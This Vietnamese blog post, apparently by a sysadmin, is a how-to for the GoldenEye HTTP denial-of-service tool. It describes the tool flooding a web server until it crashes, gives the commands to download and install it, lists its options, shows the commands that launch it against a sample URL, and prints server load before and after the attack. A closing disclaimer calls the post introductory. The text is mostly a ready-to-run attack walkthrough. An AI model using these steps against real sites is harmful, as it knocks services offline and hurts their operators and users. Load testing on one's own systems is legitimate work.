Trải nghiệm thử GoldenEye, công cụ DOS hiệu quả

by ĐỖ TRUNG QUÂN
Tác giả: ĐỖ TRUNG QUÂN Date: Last Update 0 comments 1,4K lượt xem
Dịch vụ xử lý mã độc WordPress
WEB MẪU WORDPRESS

Giới thiệu về HTTP DOS Test Tool GoldenEye

  • GoldenEye là ứng dụng kiểm tra an ninh viết bằng Python.
  • GoldenEye là công cụ test DOS HTTP.
  • Attack Vector exploited: HTTP Keep Alive + NoCache

GoldenEye công cụ test DOS HTTP

Tools này khi sử dụng sẽ tạo ra lượng traffic lớn để đè tải nặng lên webserver khiến webserver quá tải và không đủ khả năng đáp ứng nhu cầu truy cập và sẽ bị “SẬP” và “DIE” ngay.

Nếu tấn công lâu Database trên webserver sẽ bị crash. Tuy nhiên nếu luồng tấn công trên bị chặn bởi tường lửa (firewall) thì máy tính đang cấn công có thể bị treo cứng do không nhả được các gói tin tới đích được.

Các bước thực hiện

Ở máy tấn công, bạn cần tải và cài đặt Python

Note: Ở đây mình dùng máy tính cá nhân cài Win 10, mình sẽ cài Python lên Win 10, sau đó vào Store Win 10 tải Ubuntu 18 về và cài Python lên Ubuntu 18 này luôn.

Cài đặt python

Cài đặt GoldenEye

Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả
Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả

Bạn thực hiện cài đặt với các lệnh như sau

root@dotrungquan:~# mkdir GoldenEye
root@dotrungquan:~# cd GoldenEye/
root@dotrungquan:~/GoldenEye# wget https://github.com/jseidl/GoldenEye/archive/master.zip
root@dotrungquan:~/GoldenEye# unzip master.zip

Run GoldenEye – DoS website

USAGE: ./goldeneye.py <url> [OPTIONS]
Ví dụ:
./goldeneye.py https://dotrunquan.info
Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả
OPTIONS:
Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

root@dotrungquan:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
python goldeneye.py http://www.goldeneyetestsite.com/

THE ATTACK

root@dotrungquan:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
python goldeneye.py http://www.goldeneyetestsite.com/

THE RESULT

Before attack
root@someserver [~]# free -m
total used free shared buffers cached
Mem: 1024 713 302 49 9 150
-/+ buffers/cache: 552 1001
Swap: 9990 40 160

root@someserver [~]# pgrep httpd | wc -l
11
After attack
root@serv1 [~]# free -m
total used free shared buffers cached
Mem: 1024 101 90 49 9 150
-/+ buffers/cache: 3544 190
Swap: 990 40 150
root@someserver [~]# pgrep httpd | wc -l
174

Chú ý: Nếu các bạn sử dụng công cụ này với mục đích xấu sẽ phải chịu mọi trách nhiệm pháp lý trước pháp luật, bài viết mang tính chất giới thiệu để các bạn mở rộng kiến thức của mình.

Tài liệu tham khảo: GitHub.

5/5 - (1 bình chọn)

Tham gia nhóm hỗ trợ WordPress

Tham gia nhóm Hỗ trợ Server - Hosting & WordPress để cùng nhau hỏi đáp và hỗ trợ các vấn đề về WordPress, tối ưu máy chủ/server.

Tham gia ngay

Mình tên là Đỗ Trung Quân, hiện đang công tác tại AZDIGI với vị trí là SysAdmin. Mình đam mê viết Blog. Vì viết Blog giúp mình trau dồi được nhiều kỹ năng. Học hỏi thêm nhiều kiến thức mới, từ đó mình có thể chia sẻ đến các bạn các bài viết tài liệu bổ ích hơn. Hiện tại mình là admin của Blog DOTRUNGQUAN.INFO - CaiSSL.COM - QuantriVPS.COM. Mới đây mình có tạo ra nhóm Hỗ trợ Server - Hosting & WordPress | Hỗ Trợ Xử Lý Mã Độc WordPress với mục đích gây dựng một cộng đồng nhỏ để mọi người trao đổi kinh nghiệm, kiến thức quản trị VPS. Các thủ thuật, mẹo vặt khi sử dụng VPS. Rất mong nhận được sự ủng hộ của các bạn.